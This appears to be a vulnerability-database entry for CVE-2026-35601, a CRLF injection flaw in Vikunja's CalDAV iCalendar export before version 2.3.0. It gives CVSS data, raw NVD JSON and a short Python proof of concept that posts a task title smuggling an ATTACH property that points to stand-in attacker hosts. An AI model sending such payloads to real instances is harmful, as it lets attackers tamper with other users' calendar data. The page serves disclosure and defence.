Security Vulnerability Report
中文
CVE-2026-35601 CVSS 4.1 MEDIUM

CVE-2026-35601

Published: 2026-04-10 17:17:04
Last Modified: 2026-04-17 21:56:20
Source: [email protected]

Description

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV output generator builds iCalendar VTODO entries via raw string concatenation without applying RFC 5545 TEXT value escaping. User-controlled task titles containing CRLF characters break the iCalendar property boundary, allowing injection of arbitrary iCalendar properties such as ATTACH, VALARM, or ORGANIZER. This vulnerability is fixed in 2.3.0.

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept: Injecting an ATTACH property via Task Title # Payload: 'Normal Task\r\nATTACH;FMTTYPE=text/plain:https://evil.com/poc\r\nDESCRIPTION:' import requests target_url = "http://vikunja-instance/api/v1/tasks" headers = {"Authorization": "Bearer <TOKEN>"} # Malicious task title containing CRLF injection payload_title = "Buy Milk\r\nATTACH:https://attacker.com/malware\r\nSUMMARY:" data = { "title": payload_title, "description": "This task contains a malicious payload." } response = requests.post(target_url, json=data, headers=headers) print(f"Status: {response.status_code}") print("If successful, the CalDAV export will include the injected ATTACH property.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35601", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.837", "lastModified": "2026-04-17T21:56:20.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV output generator builds iCalendar VTODO entries via raw string concatenation without applying RFC 5545 TEXT value escaping. User-controlled task titles containing CRLF characters break the iCalendar property boundary, allowing injection of arbitrary iCalendar properties such as ATTACH, VALARM, or ORGANIZER. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/pull/2580", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.